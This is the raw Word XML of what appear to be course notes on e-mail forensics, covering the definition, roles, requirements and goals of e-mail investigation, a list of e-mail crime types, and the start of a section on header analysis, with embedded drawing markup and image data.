          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">What is E-mail investigation? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="382"/>
        <w:ind w:left="-5" w:right="56"/>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"E-mail investigation is a digital forensics process of finding out evidences from suspect emails that allows investigator to examine, preserve, and reveal digital evidence" (branch of forensics science). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="382"/>
        <w:ind w:left="-5" w:right="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Vital Roles of E-mail Forensics </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="263" w:lineRule="auto"/>
        <w:ind w:right="5300"/>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1.Examine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56"/>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Preserve. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56"/>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Carve Evidence. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="1144" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56"/>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Report. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="5" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="5300"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Requirements of E-mail Investigation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="5" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="530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750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">• To carve evidence. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56" w:hanging="360"/>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To ensure the reliability of e-mails. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56" w:hanging="360"/>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To pointing on illegal acts and intertwine them. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="384" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56" w:hanging="360"/>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Presenting an evidence in front of legal authorities. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5" w:right="5300"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Goal of E-mail Forensics </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9"/>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:ind w:left="-5" w:right="56"/>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E-mail investigation contains the wealth of mails that's why E-mail forensics investigator must not only investigate but also retrieve the kind of evidence from mails which is presentable and leads to legal action taken on the crime. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="00943135">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5" w:right="5300"/>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t>Types</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of E-mail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Crimes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="5" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="6928"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D6593D" w:rsidRDefault="004750F9" w:rsidP="00943135">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Email frauds. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6593D" w:rsidRDefault="00D6593D" w:rsidP="00943135">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending threatening emails. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6593D" w:rsidRDefault="00D6593D" w:rsidP="00943135">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Defamatory emails. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="00943135">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending malicious codes through email. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B2D4C" w:rsidRDefault="005B2D4C" w:rsidP="005B2D4C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B2D4C" w:rsidRPr="005B2D4C" w:rsidRDefault="005B2D4C" w:rsidP="004750F9">
      <w:pPr>
        <w:ind w:left="-5" w:right="5064"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2D4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>How To Investigates Email Crime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:ind w:left="-5" w:right="5064"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigating E-mail from Corporate- Corporate: </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single" w:color="5E5E5E"/>
        </w:rPr>
        <w:t>Apps.rai@somecompany.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="382"/>
        <w:ind w:left="-5" w:right="3590"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49254B90" wp14:editId="36D0B47F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-312548</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-117460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6120334" cy="5986490"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="16077" name="Group 16077"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6120334" cy="5986490"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6120334" cy="5986490"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="641" name="Rectangle 641"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="312549" y="2771761"/>
                            <a:ext cx="2971533" cy="323023"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="86"/>
                                </w:rPr>
                                <w:t>Header</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="-12"/>
                                  <w:w w:val="86"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="86"/>
                                </w:rPr>
                                <w:t>contains</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="-12"/>
                                  <w:w w:val="86"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="86"/>
                                </w:rPr>
                                <w:t>useful</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="-12"/>
                                  <w:w w:val="86"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="86"/>
                                </w:rPr>
                                <w:t>information-</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="642" name="Rectangle 642"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2546784" y="2771761"/>
                            <a:ext cx="43748" cy="323023"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
                              <w:r>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="643" name="Rectangle 643"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="312549" y="3013061"/>
                            <a:ext cx="118237" cy="323023"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
                              <w:r>
                                <w:t>•</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="644" name="Rectangle 644"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="551540" y="3013061"/>
                            <a:ext cx="2316263" cy="323023"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="88"/>
                                </w:rPr>
                                <w:t>Unique</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="-12"/>
                                  <w:w w:val="88"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="88"/>
                                </w:rPr>
                                <w:t>identifying</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="-12"/>
                                  <w:w w:val="88"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="88"/>
                                </w:rPr>
                                <w:t>number.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="645" name="Rectangle 645"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2293091" y="3013061"/>
                            <a:ext cx="43748" cy="323023"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
                              <w:r>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="652" name="Picture 652"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId57"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="4191397" y="0"/>
                            <a:ext cx="1928937" cy="3007318"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="653" name="Shape 653"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4191397" y="0"/>
                            <a:ext cx="1928813" cy="3007121"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1928813" h="3007121">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="3007121"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1928813" y="3007121"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1928813"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56" name="Picture 656"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId58"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3467919"/>
                            <a:ext cx="6120057" cy="2518543"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="657" name="Shape 657"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3467921"/>
                            <a:ext cx="6120209" cy="2518569"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6120209" h="2518569">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2518569"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6120209" y="2518569"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6120209"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254B90" id="Group 16077" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-24.6pt;margin-top:-9.25pt;width:481.9pt;height:471.4pt;z-index:251659264" coordsize="61203,598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jCKKAUAAJAXAAAOAAAAZHJzL2Uyb0RvYy54bWzsWOlu4zYQ/l+g7yDo&#10;/8Y6LMkS4iyKTTdYoOgGu9sHoGnKEkqJAknHTp++Mzxkx3aaY9ukRRogFiUOhzPfHJzh+fttx4Mb&#10;JlUr+nkYn0VhwHoqlm2/moe/ffv4bhYGSpN+Sbjo2Ty8ZSp8f/HjD+eboWKJaARfMhkAk15Vm2Ee&#10;NloP1WSiaMM6os7EwHqYrIXsiIZXuZosJdkA945PkijKJxshl4MUlCkFXy/tZHhh+Nc1o/pzXSum&#10;Az4PQTZtfqX5XeDv5OKcVCtJhqalTgzyDCk60vaw6cjqkmgSrGV7xKprqRRK1PqMim4i6rqlzOgA&#10;2sTRgTZXUqwHo8uq2qyGESaA9gCnZ7Olv95cy6Bdgu3yqCjCoCcdmMnsHNhPANFmWFVAeSWHr8O1&#10;dB9W9g213taywyfoE2wNuLcjuGyrAwof8ziJ0nQaBhTmsnKWT0sHP23ARkfraPPzAysnfuMJyjeK&#10;sxnAldQOLfV9aH1tyMCMERRi4NDKp7HH6gs4GelXnAX40YBjKEeoVKUAtRM4pXGSTcswAECSooiL&#10;3CwnlYcsKYs4S1MLWZqkUZIi/1FvUg1S6SsmugAH81CCKMYNyc0vSltST4L78x5/e/Gx5dzO4heA&#10;z4uII71dbJ0WC7G8BYUbIf/4DEFec7GZh8KNQox72BRnw4B/6gFoDDE/kH6w8AOp+QdhAtGK8dNa&#10;i7o1cuLGdjcnD1gQ/e5FTJmcMmXyJFOCIfNiBt59ny2naTGFXIjO/6KWtLHtdXkjBoWQsXlsPzZN&#10;7KBHQRQ/KTbTKE6jw9iM41mSQr58HYOOzvlGDAqBdWzQqffqRxk0y+JsCvkJA/CUQZM0zpP8NZKt&#10;CdHRO9+IRbNTFs2eZNEkKdOohHP4PpO+as4dvfO1DTq0tIJ/Vz3C6KgeerjKhlV6LVnomHSP4tER&#10;+ft6eAeF7kB0u2h5q29N0Q4lCgrV31y3FAsjfNkrrbLxPIZ53DbI4ROUJJ4OV2H5gu93mCx4O2Bt&#10;g+UFjp24UO8f1MsnNLa1+KWg64712jYXknGQXPSqaQcVBrJi3YJBrSw/LV2pprRkmja4YQ0b43lj&#10;C6txwki5EwxlvqccnMZlnJZwpoA/u9LYV4JxmczK8biJoiKNZ4jIc0tBI5QVwwxBqpeqtrLxcDaV&#10;Ndh2TH2PyuMPoDSLfQoHlOLEmGkPJbq2BTMazBfJ0LUtbbkM3xo/otveD7Gs/ssGEvwb1yFTHAZQ&#10;JaPFjCwNnjdWFJzvoHz+JgylPuh5QMzdLO+PqTwfa3hP4Z+D4Tfua5LiPgSezj+P6Y3TgRSewj8t&#10;pT07D2koF4pZgVB145IjHMBrH3DeG2SSIgJelEC7X0N8mYalazXcA/C2A+Qi/HPefaI/UfqWMwSQ&#10;919YDYcnNJexYaLkavGBy+CGYJNxlw2Q4hobpG5VdO8qJCV8aIjj5aRxGxglHSekZOaiYRTGsaVO&#10;GnvbAD07KO3vHACYcZERS/R6XN/DTYnZEItVp+2uP0KsXV9kMyLE7n8ot+f+3L8ec3uOymJexDPg&#10;35DbzWFDAPq/L7e7whOaxDIuUd9dl48XI1HmWokki2fZ9Lva/NfM7eMFks/tBer66KZrDyWbue+i&#10;lERwWYINl0EpNzhCJPnbp/1U84/mdrSYkQVyuxcFLbrL3qcy5m72VF71fDC878vA475HEHiO/mn3&#10;36ffJVR7rtyltMAf0vyf2/fStD1oXjC3m1tNuPY1DuGuqPFeef/dnAW7i/SLPwE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BppaFS4QAAAAsBAAAPAAAAZHJzL2Rvd25y&#10;ZXYueG1sTI/BasJAEIbvhb7DMkJvutkYRWM2ItL2JIVqofS2ZsckmN0N2TWJb9/pqd7+YT7++Sbb&#10;jqZhPXa+dlaCmEXA0BZO17aU8HV6m66A+